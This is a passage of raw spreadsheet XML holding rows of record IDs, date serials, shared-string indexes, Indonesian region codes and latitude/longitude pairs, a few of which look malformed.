      <c r="W4182" s="5">
        <v>-61783676</v>
      </c>
      <c r="X4182" t="s">
        <v>21976</v>
      </c>
      <c r="Y4182" t="str">
        <f t="shared" si="65"/>
        <v>-6.1783676,106.8445984</v>
      </c>
    </row>
    <row r="4183" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4183">
        <v>299646</v>
      </c>
      <c r="B4183" s="1">
        <v>44551</v>
      </c>
      <c r="C4183" t="s">
        <v>14313</v>
      </c>
      <c r="D4183" t="s">
        <v>22</v>
      </c>
      <c r="E4183" t="s">
        <v>23</v>
      </c>
      <c r="F4183" t="s">
        <v>14314</v>
      </c>
      <c r="G4183" t="s">
        <v>14315</v>
      </c>
      <c r="H4183" t="s">
        <v>26</v>
      </c>
      <c r="I4183" t="s">
        <v>2256</v>
      </c>
      <c r="J4183" t="s">
        <v>13662</v>
      </c>
      <c r="L4183" t="s">
        <v>14316</v>
      </c>
      <c r="M4183">
        <v>3171050004</v>
      </c>
      <c r="N4183">
        <v>3171050</v>
      </c>
      <c r="O4183">
        <v>3171</v>
      </c>
      <c r="P4183">
        <v>31</v>
      </c>
      <c r="Q4183" t="s">
        <v>8148</v>
      </c>
      <c r="R4183" t="s">
        <v>508</v>
      </c>
      <c r="S4183" t="s">
        <v>108</v>
      </c>
      <c r="T4183" t="s">
        <v>33</v>
      </c>
      <c r="U4183" s="5">
        <v>1067702812</v>
      </c>
      <c r="V4183" s="5" t="s">
        <v>18244</v>
      </c>
      <c r="W4183" s="5">
        <v>-62380927</v>
      </c>
      <c r="X4183" t="s">
        <v>21977</v>
      </c>
      <c r="Y4183" t="str">
        <f t="shared" si="65"/>
        <v>-6.2380927,106.7702812</v>
      </c>
    </row>
    <row r="4184" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4184">
        <v>299648</v>
      </c>
      <c r="B4184" s="1">
        <v>44551</v>
      </c>
      <c r="C4184" t="s">
        <v>14317</v>
      </c>
      <c r="D4184" t="s">
        <v>22</v>
      </c>
      <c r="E4184" t="s">
        <v>23</v>
      </c>
      <c r="F4184" t="s">
        <v>14318</v>
      </c>
      <c r="G4184" t="s">
        <v>14319</v>
      </c>
      <c r="H4184" t="s">
        <v>26</v>
      </c>
      <c r="I4184" t="s">
        <v>76</v>
      </c>
      <c r="J4184" t="s">
        <v>3135</v>
      </c>
      <c r="L4184" t="s">
        <v>14320</v>
      </c>
      <c r="M4184">
        <v>3671060004</v>
      </c>
      <c r="N4184">
        <v>3671060</v>
      </c>
      <c r="O4184">
        <v>3671</v>
      </c>
      <c r="P4184">
        <v>36</v>
      </c>
      <c r="Q4184" t="s">
        <v>14321</v>
      </c>
      <c r="R4184" t="s">
        <v>1961</v>
      </c>
      <c r="S4184" t="s">
        <v>201</v>
      </c>
      <c r="T4184" t="s">
        <v>171</v>
      </c>
      <c r="U4184" s="5">
        <v>1066697145</v>
      </c>
      <c r="V4184" s="5" t="s">
        <v>18245</v>
      </c>
      <c r="W4184" s="5">
        <v>-61170797</v>
      </c>
      <c r="X4184" t="s">
        <v>21978</v>
      </c>
      <c r="Y4184" t="str">
        <f t="shared" si="65"/>
        <v>-6.1170797,106.6697145</v>
      </c>
    </row>
    <row r="4185" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4185">
        <v>299650</v>
      </c>
      <c r="B4185" s="1">
        <v>44552</v>
      </c>
      <c r="C4185" t="s">
        <v>14322</v>
      </c>
      <c r="D4185" t="s">
        <v>22</v>
      </c>
      <c r="E4185" t="s">
        <v>23</v>
      </c>
      <c r="F4185" t="s">
        <v>14323</v>
      </c>
      <c r="H4185" t="s">
        <v>26</v>
      </c>
      <c r="I4185" t="s">
        <v>7646</v>
      </c>
      <c r="J4185" t="s">
        <v>14324</v>
      </c>
      <c r="L4185" t="s">
        <v>14325</v>
      </c>
      <c r="M4185">
        <v>3172050006</v>
      </c>
      <c r="N4185">
        <v>3172050</v>
      </c>
      <c r="O4185">
        <v>3172</v>
      </c>
      <c r="P4185">
        <v>31</v>
      </c>
      <c r="Q4185" t="s">
        <v>357</v>
      </c>
      <c r="R4185" t="s">
        <v>358</v>
      </c>
      <c r="S4185" t="s">
        <v>49</v>
      </c>
      <c r="T4185" t="s">
        <v>33</v>
      </c>
      <c r="U4185" s="5">
        <v>1068706810</v>
      </c>
      <c r="V4185" s="5" t="s">
        <v>18246</v>
      </c>
      <c r="W4185" s="5">
        <v>-62635535</v>
      </c>
      <c r="X4185" t="s">
        <v>21979</v>
      </c>
      <c r="Y4185" t="str">
        <f t="shared" si="65"/>
        <v>-6.2635535,106.8706810</v>
      </c>
    </row>
    <row r="4186" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4186">
        <v>299660</v>
      </c>
      <c r="B4186" s="1">
        <v>44553</v>
      </c>
      <c r="C4186" t="s">
        <v>14326</v>
      </c>
      <c r="D4186" t="s">
        <v>22</v>
      </c>
      <c r="E4186" t="s">
        <v>23</v>
      </c>
      <c r="F4186" t="s">
        <v>14327</v>
      </c>
      <c r="G4186" t="s">
        <v>14328</v>
      </c>
      <c r="H4186" t="s">
        <v>7978</v>
      </c>
      <c r="I4186" t="s">
        <v>8459</v>
      </c>
      <c r="J4186" t="s">
        <v>3135</v>
      </c>
      <c r="L4186" t="s">
        <v>14329</v>
      </c>
      <c r="M4186">
        <v>3671030014</v>
      </c>
      <c r="N4186">
        <v>3671030</v>
      </c>
      <c r="O4186">
        <v>3671</v>
      </c>
      <c r="P4186">
        <v>36</v>
      </c>
      <c r="Q4186" t="s">
        <v>7032</v>
      </c>
      <c r="R4186" t="s">
        <v>201</v>
      </c>
      <c r="S4186" t="s">
        <v>201</v>
      </c>
      <c r="T4186" t="s">
        <v>171</v>
      </c>
      <c r="U4186" s="5">
        <v>1066299775</v>
      </c>
      <c r="V4186" s="5" t="s">
        <v>18247</v>
      </c>
      <c r="W4186" s="5">
        <v>-61776970</v>
      </c>
      <c r="X4186" t="s">
        <v>21980</v>
      </c>
      <c r="Y4186" t="str">
        <f t="shared" si="65"/>
        <v>-6.1776970,106.6299775</v>
      </c>
    </row>
    <row r="4187" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4187">
        <v>299661</v>
      </c>
      <c r="B4187" s="1">
        <v>44553</v>
      </c>
      <c r="C4187" t="s">
        <v>14330</v>
      </c>
      <c r="D4187" t="s">
        <v>22</v>
      </c>
      <c r="E4187" t="s">
        <v>23</v>
      </c>
      <c r="F4187" t="s">
        <v>14331</v>
      </c>
      <c r="G4187" t="s">
        <v>14332</v>
      </c>
      <c r="H4187" t="s">
        <v>7978</v>
      </c>
      <c r="I4187" t="s">
        <v>8459</v>
      </c>
      <c r="J4187" t="s">
        <v>3135</v>
      </c>
      <c r="L4187" t="s">
        <v>14333</v>
      </c>
      <c r="M4187">
        <v>3671030014</v>
      </c>
      <c r="N4187">
        <v>3671030</v>
      </c>
      <c r="O4187">
        <v>3671</v>
      </c>
      <c r="P4187">
        <v>36</v>
      </c>
      <c r="Q4187" t="s">
        <v>7032</v>
      </c>
      <c r="R4187" t="s">
        <v>201</v>
      </c>
      <c r="S4187" t="s">
        <v>201</v>
      </c>
      <c r="T4187" t="s">
        <v>171</v>
      </c>
      <c r="U4187" s="5">
        <v>1066334912</v>
      </c>
      <c r="V4187" s="5" t="s">
        <v>18248</v>
      </c>
      <c r="W4187" s="5">
        <v>-61779583</v>
      </c>
      <c r="X4187" t="s">
        <v>21981</v>
      </c>
      <c r="Y4187" t="str">
        <f t="shared" si="65"/>
        <v>-6.1779583,106.6334912</v>
      </c>
    </row>
    <row r="4188" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4188">
        <v>299670</v>
      </c>
      <c r="B4188" s="1">
        <v>44554</v>
      </c>
      <c r="C4188" t="s">
        <v>14334</v>
      </c>
      <c r="D4188" t="s">
        <v>22</v>
      </c>
      <c r="E4188" t="s">
        <v>23</v>
      </c>
      <c r="F4188" t="s">
        <v>14335</v>
      </c>
      <c r="G4188" t="s">
        <v>14336</v>
      </c>
      <c r="H4188" t="s">
        <v>7978</v>
      </c>
      <c r="I4188" t="s">
        <v>8459</v>
      </c>
      <c r="J4188" t="s">
        <v>2622</v>
      </c>
      <c r="L4188" t="s">
        <v>14337</v>
      </c>
      <c r="M4188">
        <v>3507110007</v>
      </c>
      <c r="N4188">
        <v>3507110</v>
      </c>
      <c r="O4188">
        <v>3507</v>
      </c>
      <c r="P4188">
        <v>35</v>
      </c>
      <c r="Q4188" t="s">
        <v>14338</v>
      </c>
      <c r="R4188" t="s">
        <v>14339</v>
      </c>
      <c r="S4188" t="s">
        <v>6321</v>
      </c>
      <c r="T4188" t="s">
        <v>1221</v>
      </c>
      <c r="U4188" s="5">
        <v>1127310167</v>
      </c>
      <c r="V4188" s="5" t="s">
        <v>18249</v>
      </c>
      <c r="W4188" s="5">
        <v>-81169830</v>
      </c>
      <c r="X4188" t="s">
        <v>21982</v>
      </c>
      <c r="Y4188" t="str">
        <f t="shared" si="65"/>
        <v>-8.1169830,112.7310167</v>
      </c>
    </row>
    <row r="4189" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4189">
        <v>299671</v>
      </c>
      <c r="B4189" s="1">
        <v>44555</v>
      </c>
      <c r="C4189" t="s">
        <v>14340</v>
      </c>
      <c r="D4189" t="s">
        <v>22</v>
      </c>
      <c r="E4189" t="s">
        <v>23</v>
      </c>
      <c r="F4189" t="s">
        <v>14341</v>
      </c>
      <c r="G4189" t="s">
        <v>14342</v>
      </c>
      <c r="H4189" t="s">
        <v>26</v>
      </c>
      <c r="I4189" t="s">
        <v>137</v>
      </c>
      <c r="J4189" t="s">
        <v>3013</v>
      </c>
      <c r="L4189" t="s">
        <v>14343</v>
      </c>
      <c r="M4189">
        <v>1671020015</v>
      </c>
      <c r="N4189">
        <v>1671020</v>
      </c>
      <c r="O4189">
        <v>1671</v>
      </c>
      <c r="P4189">
        <v>16</v>
      </c>
      <c r="Q4189" t="s">
        <v>14344</v>
      </c>
      <c r="R4189" t="s">
        <v>14345</v>
      </c>
      <c r="S4189" t="s">
        <v>7547</v>
      </c>
      <c r="T4189" t="s">
        <v>1418</v>
      </c>
      <c r="U4189" s="5">
        <v>1047808002</v>
      </c>
      <c r="V4189" s="5" t="s">
        <v>18250</v>
      </c>
      <c r="W4189" s="5">
        <v>-30050834</v>
      </c>
      <c r="X4189" t="s">
        <v>21983</v>
      </c>
      <c r="Y4189" t="str">
        <f t="shared" si="65"/>
        <v>-3.0050834,104.7808002</v>
      </c>
    </row>
    <row r="4190" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4190">
        <v>299683</v>
      </c>
      <c r="B4190" s="1">
        <v>44555</v>
      </c>
      <c r="C4190" t="s">
        <v>14346</v>
      </c>
      <c r="D4190" t="s">
        <v>22</v>
      </c>
      <c r="E4190" t="s">
        <v>23</v>
      </c>
      <c r="F4190" t="s">
        <v>14347</v>
      </c>
      <c r="G4190" t="s">
        <v>14348</v>
      </c>
      <c r="H4190" t="s">
        <v>7978</v>
      </c>
      <c r="I4190" t="s">
        <v>7979</v>
      </c>
      <c r="J4190" t="s">
        <v>2627</v>
      </c>
      <c r="L4190" t="s">
        <v>14349</v>
      </c>
      <c r="M4190">
        <v>3204100004</v>
      </c>
      <c r="N4190">
        <v>3204100</v>
      </c>
      <c r="O4190">
        <v>3204</v>
      </c>
      <c r="P4190">
        <v>32</v>
      </c>
      <c r="Q4190" t="s">
        <v>14350</v>
      </c>
      <c r="R4190" t="s">
        <v>14351</v>
      </c>
      <c r="S4190" t="s">
        <v>1464</v>
      </c>
      <c r="T4190" t="s">
        <v>42</v>
      </c>
      <c r="U4190" s="5">
        <v>1078495100</v>
      </c>
      <c r="V4190" s="5" t="s">
        <v>18251</v>
      </c>
      <c r="W4190" s="5">
        <v>-69960631</v>
      </c>
      <c r="X4190" t="s">
        <v>21984</v>
      </c>
      <c r="Y4190" t="str">
        <f t="shared" si="65"/>
        <v>-6.9960631,107.8495100</v>
      </c>
    </row>
    <row r="4191" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4191">
        <v>299693</v>
      </c>
      <c r="B4191" s="1">
        <v>44555</v>
      </c>
      <c r="C4191" t="s">
        <v>14352</v>
      </c>
      <c r="D4191" t="s">
        <v>22</v>
      </c>
      <c r="E4191" t="s">
        <v>23</v>
      </c>
      <c r="F4191" t="s">
        <v>14353</v>
      </c>
      <c r="G4191" t="s">
        <v>14354</v>
      </c>
      <c r="H4191" t="s">
        <v>7978</v>
      </c>
      <c r="I4191" t="s">
        <v>7983</v>
      </c>
      <c r="J4191" t="s">
        <v>2627</v>
      </c>
      <c r="L4191" t="s">
        <v>14355</v>
      </c>
      <c r="M4191">
        <v>3271020002</v>
      </c>
      <c r="N4191">
        <v>3271020</v>
      </c>
      <c r="O4191">
        <v>3271</v>
      </c>
      <c r="P4191">
        <v>32</v>
      </c>
      <c r="Q4191" t="s">
        <v>14356</v>
      </c>
      <c r="R4191" t="s">
        <v>994</v>
      </c>
      <c r="S4191" t="s">
        <v>421</v>
      </c>
      <c r="T4191" t="s">
        <v>42</v>
      </c>
      <c r="U4191" s="5">
        <v>1068303283</v>
      </c>
      <c r="V4191" s="5" t="s">
        <v>18252</v>
      </c>
      <c r="W4191" s="5">
        <v>-66343620</v>
      </c>
      <c r="X4191" t="s">
        <v>21985</v>
      </c>
      <c r="Y4191" t="str">
        <f t="shared" si="65"/>
        <v>-6.6343620,106.8303283</v>
      </c>
    </row>
    <row r="4192" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4192">
        <v>299696</v>
      </c>
      <c r="B4192" s="1">
        <v>44556</v>
      </c>
      <c r="C4192" t="s">
        <v>14357</v>
      </c>
      <c r="D4192" t="s">
        <v>22</v>
      </c>
      <c r="E4192" t="s">
        <v>23</v>
      </c>
      <c r="F4192" t="s">
        <v>14358</v>
      </c>
      <c r="G4192" t="s">
        <v>14359</v>
      </c>
      <c r="H4192" t="s">
        <v>26</v>
      </c>
      <c r="I4192" t="s">
        <v>181</v>
      </c>
      <c r="J4192" t="s">
        <v>3013</v>
      </c>
      <c r="L4192" t="s">
        <v>14360</v>
      </c>
      <c r="M4192">
        <v>1607030028</v>
      </c>
      <c r="N4192">
        <v>1607030</v>
      </c>
      <c r="O4192">
        <v>1607</v>
      </c>
      <c r="P4192">
        <v>16</v>
      </c>
      <c r="Q4192" t="s">
        <v>14361</v>
      </c>
      <c r="R4192" t="s">
        <v>14362</v>
      </c>
      <c r="S4192" t="s">
        <v>14363</v>
      </c>
      <c r="T4192" t="s">
        <v>1418</v>
      </c>
      <c r="U4192" s="5">
        <v>1045729749</v>
      </c>
      <c r="V4192" s="5" t="s">
        <v>18253</v>
      </c>
      <c r="W4192" s="5">
        <v>-25679031</v>
      </c>
      <c r="X4192" t="s">
        <v>21986</v>
      </c>
      <c r="Y4192" t="str">
        <f t="shared" si="65"/>
        <v>-2.5679031,104.5729749</v>
      </c>
    </row>
    <row r="4193" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4193">
        <v>299700</v>
      </c>
      <c r="B4193" s="1">
        <v>44556</v>
      </c>
      <c r="C4193" t="s">
        <v>14364</v>
      </c>
      <c r="D4193" t="s">
        <v>22</v>
      </c>
      <c r="E4193" t="s">
        <v>23</v>
      </c>
      <c r="F4193" t="s">
        <v>14365</v>
      </c>
      <c r="H4193" t="s">
        <v>7978</v>
      </c>
      <c r="I4193" t="s">
        <v>8459</v>
      </c>
      <c r="J4193" t="s">
        <v>2627</v>
      </c>
      <c r="L4193" t="s">
        <v>14366</v>
      </c>
      <c r="M4193">
        <v>3201081005</v>
      </c>
      <c r="N4193">
        <v>3201081</v>
      </c>
      <c r="O4193">
        <v>3201</v>
      </c>
      <c r="P4193">
        <v>32</v>
      </c>
      <c r="Q4193" t="s">
        <v>14367</v>
      </c>
      <c r="R4193" t="s">
        <v>14368</v>
      </c>
      <c r="S4193" t="s">
        <v>421</v>
      </c>
      <c r="T4193" t="s">
        <v>42</v>
      </c>
      <c r="U4193" s="5">
        <v>1068032670</v>
      </c>
      <c r="V4193" s="5" t="s">
        <v>18254</v>
      </c>
      <c r="W4193" s="5">
        <v>-67357441</v>
      </c>
      <c r="X4193" t="s">
        <v>21987</v>
      </c>
      <c r="Y4193" t="str">
        <f t="shared" si="65"/>
        <v>-6.7357441,106.8032670</v>
      </c>
    </row>
    <row r="4194" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4194">
        <v>299701</v>
      </c>
      <c r="B4194" s="1">
        <v>44556</v>
      </c>
      <c r="C4194" t="s">
        <v>14369</v>
      </c>
      <c r="D4194" t="s">
        <v>22</v>
      </c>
      <c r="E4194" t="s">
        <v>23</v>
      </c>
      <c r="F4194" t="s">
        <v>14370</v>
      </c>
      <c r="H4194" t="s">
        <v>26</v>
      </c>
      <c r="I4194" t="s">
        <v>1809</v>
      </c>
      <c r="J4194" t="s">
        <v>2627</v>
      </c>
      <c r="L4194" t="s">
        <v>14371</v>
      </c>
      <c r="M4194">
        <v>3209111004</v>
      </c>
      <c r="N4194">
        <v>3209111</v>
      </c>
      <c r="O4194">
        <v>3209</v>
      </c>
      <c r="P4194">
        <v>32</v>
      </c>
      <c r="Q4194" t="s">
        <v>14372</v>
      </c>
      <c r="R4194" t="s">
        <v>14373</v>
      </c>
      <c r="S4194" t="s">
        <v>6532</v>
      </c>
      <c r="T4194" t="s">
        <v>42</v>
      </c>
      <c r="U4194" s="5">
        <v>1085122170</v>
      </c>
      <c r="V4194" s="5" t="s">
        <v>18255</v>
      </c>
      <c r="W4194" s="5">
        <v>-67631501</v>
      </c>
      <c r="X4194" t="s">
        <v>21988</v>
      </c>
      <c r="Y4194" t="str">
        <f t="shared" si="65"/>
        <v>-6.7631501,108.5122170</v>
      </c>
    </row>
    <row r="4195" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4195">
        <v>299713</v>
      </c>
      <c r="B4195" s="1">
        <v>44557</v>
      </c>
      <c r="C4195" t="s">
        <v>14374</v>
      </c>
      <c r="D4195" t="s">
        <v>22</v>
      </c>
      <c r="E4195" t="s">
        <v>23</v>
      </c>
      <c r="F4195" t="s">
        <v>14375</v>
      </c>
      <c r="G4195" t="s">
        <v>14376</v>
      </c>
      <c r="H4195" t="s">
        <v>26</v>
      </c>
      <c r="I4195" t="s">
        <v>14377</v>
      </c>
      <c r="J4195" t="s">
        <v>2627</v>
      </c>
      <c r="L4195" t="s">
        <v>14378</v>
      </c>
      <c r="M4195">
        <v>3205290002</v>
      </c>
      <c r="N4195">
        <v>3205290</v>
      </c>
      <c r="O4195">
        <v>3205</v>
      </c>
      <c r="P4195">
        <v>32</v>
      </c>
      <c r="Q4195" t="s">
        <v>14379</v>
      </c>
      <c r="R4195" t="s">
        <v>14380</v>
      </c>
      <c r="S4195" t="s">
        <v>1866</v>
      </c>
      <c r="T4195" t="s">
        <v>42</v>
      </c>
      <c r="U4195" s="5">
        <v>1079361971</v>
      </c>
      <c r="V4195" s="5" t="s">
        <v>18256</v>
      </c>
      <c r="W4195" s="5">
        <v>-70374015</v>
      </c>
      <c r="X4195" t="s">
        <v>21989</v>
      </c>
      <c r="Y4195" t="str">
        <f t="shared" si="65"/>
        <v>-7.0374015,107.9361971</v>
      </c>
    </row>
    <row r="4196" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4196">
        <v>299714</v>
      </c>
      <c r="B4196" s="1">
        <v>44557</v>
      </c>
      <c r="C4196" t="s">
        <v>14381</v>
      </c>
      <c r="D4196" t="s">
        <v>85</v>
      </c>
      <c r="E4196" t="s">
        <v>23</v>
      </c>
      <c r="F4196" t="s">
        <v>14382</v>
      </c>
      <c r="G4196" t="s">
        <v>14383</v>
      </c>
      <c r="H4196" t="s">
        <v>26</v>
      </c>
      <c r="J4196" t="s">
        <v>7178</v>
      </c>
      <c r="K4196" t="s">
        <v>14384</v>
      </c>
      <c r="L4196" t="s">
        <v>14385</v>
      </c>
      <c r="M4196">
        <v>1810070004</v>
      </c>
      <c r="N4196">
        <v>1810070</v>
      </c>
      <c r="O4196">
        <v>1810</v>
      </c>
      <c r="P4196">
        <v>18</v>
      </c>
      <c r="Q4196" t="s">
        <v>8533</v>
      </c>
      <c r="R4196" t="s">
        <v>13454</v>
      </c>
      <c r="S4196" t="s">
        <v>14386</v>
      </c>
      <c r="T4196" t="s">
        <v>2082</v>
      </c>
      <c r="U4196" s="5">
        <v>1049159950</v>
      </c>
      <c r="V4196" s="5" t="s">
        <v>18257</v>
      </c>
      <c r="W4196" s="5">
        <v>-52779750</v>
      </c>
      <c r="X4196" t="s">
        <v>21990</v>
      </c>
      <c r="Y4196" t="str">
        <f t="shared" si="65"/>
        <v>-5.2779750,104.9159950</v>
      </c>
    </row>
    <row r="4197" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4197">
        <v>299717</v>
      </c>
      <c r="B4197" s="1">
        <v>44557</v>
      </c>
      <c r="C4197" t="s">
        <v>14387</v>
      </c>
      <c r="D4197" t="s">
        <v>22</v>
      </c>
      <c r="E4197" t="s">
        <v>23</v>
      </c>
      <c r="F4197" t="s">
        <v>14388</v>
      </c>
      <c r="H4197" t="s">
        <v>26</v>
      </c>
      <c r="I4197" t="s">
        <v>1080</v>
      </c>
      <c r="J4197" t="s">
        <v>1128</v>
      </c>
      <c r="L4197" t="s">
        <v>14389</v>
      </c>
      <c r="U4197" s="5">
        <v>728132629</v>
      </c>
      <c r="V4197" s="5" t="s">
        <v>18258</v>
      </c>
      <c r="W4197" s="5">
        <v>189036881</v>
      </c>
      <c r="X4197" t="s">
        <v>21991</v>
      </c>
      <c r="Y4197" t="str">
        <f t="shared" si="65"/>
        <v>18.9036881,728.132629</v>
      </c>
    </row>
    <row r="4198" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4198">
        <v>299718</v>
      </c>
      <c r="B4198" s="1">
        <v>44557</v>
      </c>
      <c r="C4198" t="s">
        <v>14390</v>
      </c>
      <c r="D4198" t="s">
        <v>22</v>
      </c>
      <c r="E4198" t="s">
        <v>23</v>
      </c>
      <c r="F4198" t="s">
        <v>14391</v>
      </c>
      <c r="G4198" t="s">
        <v>14392</v>
      </c>
      <c r="H4198" t="s">
        <v>12316</v>
      </c>
      <c r="I4198" t="s">
        <v>12317</v>
      </c>
      <c r="J4198" t="s">
        <v>6038</v>
      </c>
      <c r="L4198" t="s">
        <v>14393</v>
      </c>
      <c r="M4198">
        <v>1278040023</v>
      </c>
      <c r="N4198">
        <v>1278040</v>
      </c>
      <c r="O4198">
        <v>1278</v>
      </c>
      <c r="P4198">
        <v>12</v>
      </c>
      <c r="Q4198" t="s">
        <v>14394</v>
      </c>
      <c r="R4198" t="s">
        <v>14395</v>
      </c>
      <c r="S4198" t="s">
        <v>14396</v>
      </c>
      <c r="T4198" t="s">
        <v>6043</v>
      </c>
      <c r="U4198" s="5">
        <v>976080537</v>
      </c>
      <c r="V4198" s="5" t="s">
        <v>18259</v>
      </c>
      <c r="W4198" s="5">
        <v>12997728</v>
      </c>
      <c r="X4198" t="s">
        <v>21992</v>
      </c>
      <c r="Y4198" t="str">
        <f t="shared" si="65"/>
        <v>1.2997728,976.080537</v>
      </c>
    </row>
    <row r="4199" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4199">
        <v>299720</v>
      </c>
      <c r="B4199" s="1">
        <v>44558</v>
      </c>
      <c r="C4199" t="s">
        <v>14397</v>
      </c>
      <c r="D4199" t="s">
        <v>22</v>
      </c>
      <c r="E4199" t="s">
        <v>23</v>
      </c>
      <c r="F4199" t="s">
        <v>14398</v>
      </c>
      <c r="G4199" t="s">
        <v>14399</v>
      </c>
      <c r="H4199" t="s">
        <v>26</v>
      </c>
      <c r="I4199" t="s">
        <v>5270</v>
      </c>
      <c r="J4199" t="s">
        <v>7171</v>
      </c>
      <c r="L4199" t="s">
        <v>14400</v>
      </c>
      <c r="M4199">
        <v>6404054006</v>
      </c>
      <c r="N4199">
        <v>6404054</v>
      </c>
      <c r="O4199">
        <v>6404</v>
      </c>
      <c r="P4199">
        <v>64</v>
      </c>
      <c r="Q4199" t="s">
        <v>14401</v>
      </c>
      <c r="R4199" t="s">
        <v>14402</v>
      </c>
      <c r="S4199" t="s">
        <v>9302</v>
      </c>
      <c r="T4199" t="s">
        <v>1308</v>
      </c>
      <c r="U4199" s="5">
        <v>1176558708</v>
      </c>
      <c r="V4199" s="5" t="s">
        <v>18260</v>
      </c>
      <c r="W4199" s="5">
        <v>13437708</v>
      </c>
      <c r="X4199" t="s">
        <v>21993</v>
      </c>
      <c r="Y4199" t="str">
        <f t="shared" si="65"/>
        <v>1.3437708,117.6558708</v>
      </c>
    </row>
    <row r="4200" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4200">
        <v>299721</v>
      </c>
      <c r="B4200" s="1">
        <v>44558</v>
      </c>
      <c r="C4200" t="s">
        <v>14403</v>
      </c>
      <c r="D4200" t="s">
        <v>22</v>
      </c>
      <c r="E4200" t="s">
        <v>23</v>
      </c>
      <c r="F4200" t="s">
        <v>14404</v>
      </c>
      <c r="G4200" t="s">
        <v>14405</v>
      </c>
      <c r="H4200" t="s">
        <v>26</v>
      </c>
      <c r="I4200" t="s">
        <v>4228</v>
      </c>
      <c r="J4200" t="s">
        <v>7171</v>
      </c>
      <c r="L4200" t="s">
        <v>14406</v>
      </c>
      <c r="M4200">
        <v>6404054006</v>
      </c>
      <c r="N4200">
        <v>6404054</v>
      </c>
      <c r="O4200">
        <v>6404</v>
      </c>
      <c r="P4200">
        <v>64</v>
      </c>
      <c r="Q4200" t="s">
        <v>14401</v>
      </c>
      <c r="R4200" t="s">
        <v>14402</v>
      </c>
      <c r="S4200" t="s">
        <v>9302</v>
      </c>
      <c r="T4200" t="s">
        <v>1308</v>
      </c>
      <c r="U4200" s="5">
        <v>1176655040</v>
      </c>
      <c r="V4200" s="5" t="s">
        <v>18261</v>
      </c>
      <c r="W4200" s="5">
        <v>13510431</v>
      </c>
      <c r="X4200" t="s">
        <v>21994</v>
      </c>
      <c r="Y4200" t="str">
        <f t="shared" si="65"/>
        <v>1.3510431,117.6655040</v>
      </c>
    </row>
    <row r="4201" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4201">
        <v>299723</v>
      </c>
      <c r="B4201" s="1">
        <v>44558</v>
      </c>
      <c r="C4201" t="s">
        <v>14407</v>
      </c>
      <c r="D4201" t="s">
        <v>22</v>
      </c>
      <c r="E4201" t="s">
        <v>23</v>
      </c>
      <c r="F4201" t="s">
        <v>14408</v>
      </c>
      <c r="H4201" t="s">
        <v>26</v>
      </c>
      <c r="I4201" t="s">
        <v>383</v>
      </c>
      <c r="J4201" t="s">
        <v>14409</v>
      </c>
      <c r="L4201" t="s">
        <v>14410</v>
      </c>
      <c r="M4201">
        <v>3173070004</v>
      </c>
      <c r="N4201">
        <v>3173070</v>
      </c>
      <c r="O4201">
        <v>3173</v>
      </c>
      <c r="P4201">
        <v>31</v>
      </c>
      <c r="Q4201" t="s">
        <v>526</v>
      </c>
      <c r="R4201" t="s">
        <v>323</v>
      </c>
      <c r="S4201" t="s">
        <v>62</v>
      </c>
      <c r="T4201" t="s">
        <v>33</v>
      </c>
      <c r="U4201" s="5">
        <v>1068276215</v>
      </c>
      <c r="V4201" s="5" t="s">
        <v>18262</v>
      </c>
      <c r="W4201" s="5">
        <v>-61573981</v>
      </c>
      <c r="X4201" t="s">
        <v>21995</v>
      </c>
      <c r="Y4201" t="str">
        <f t="shared" si="65"/>
        <v>-6.1573981,106.8276215</v>
      </c>
    </row>
    <row r="4202" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4202">
        <v>299724</v>
      </c>
      <c r="B4202" s="1">
        <v>44558</v>
      </c>
      <c r="C4202" t="s">
        <v>14411</v>
      </c>
      <c r="D4202" t="s">
        <v>22</v>
      </c>
      <c r="E4202" t="s">
        <v>23</v>
      </c>
      <c r="F4202" t="s">
        <v>14412</v>
      </c>
      <c r="G4202" t="s">
        <v>14413</v>
      </c>
      <c r="H4202" t="s">
        <v>26</v>
      </c>
      <c r="I4202" t="s">
        <v>3603</v>
      </c>
      <c r="J4202" t="s">
        <v>2627</v>
      </c>
      <c r="L4202" t="s">
        <v>14414</v>
      </c>
      <c r="M4202">
        <v>3207111005</v>
      </c>
      <c r="N4202">
        <v>3207111</v>
      </c>
      <c r="O4202">
        <v>3207</v>
      </c>
      <c r="P4202">
        <v>32</v>
      </c>
      <c r="Q4202" t="s">
        <v>12979</v>
      </c>
      <c r="R4202" t="s">
        <v>14415</v>
      </c>
      <c r="S4202" t="s">
        <v>6562</v>
      </c>
      <c r="T4202" t="s">
        <v>42</v>
      </c>
      <c r="U4202" s="5">
        <v>1086955703</v>
      </c>
      <c r="V4202" s="5" t="s">
        <v>18263</v>
      </c>
      <c r="W4202" s="5">
        <v>-74600767</v>
      </c>
      <c r="X4202" t="s">
        <v>21996</v>
      </c>
      <c r="Y4202" t="str">
        <f t="shared" si="65"/>
        <v>-7.4600767,108.6955703</v>
      </c>
    </row>
    <row r="4203" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4203">
        <v>299726</v>
      </c>
      <c r="B4203" s="1">
        <v>44559</v>
      </c>
      <c r="C4203" t="s">
        <v>14416</v>
      </c>
      <c r="D4203" t="s">
        <v>85</v>
      </c>
      <c r="E4203" t="s">
        <v>23</v>
      </c>
      <c r="F4203" t="s">
        <v>14417</v>
      </c>
      <c r="G4203" t="s">
        <v>14418</v>
      </c>
      <c r="H4203" t="s">
        <v>26</v>
      </c>
      <c r="J4203" t="s">
        <v>14419</v>
      </c>
      <c r="K4203" t="s">
        <v>14420</v>
      </c>
      <c r="L4203" t="s">
        <v>14421</v>
      </c>
      <c r="M4203">
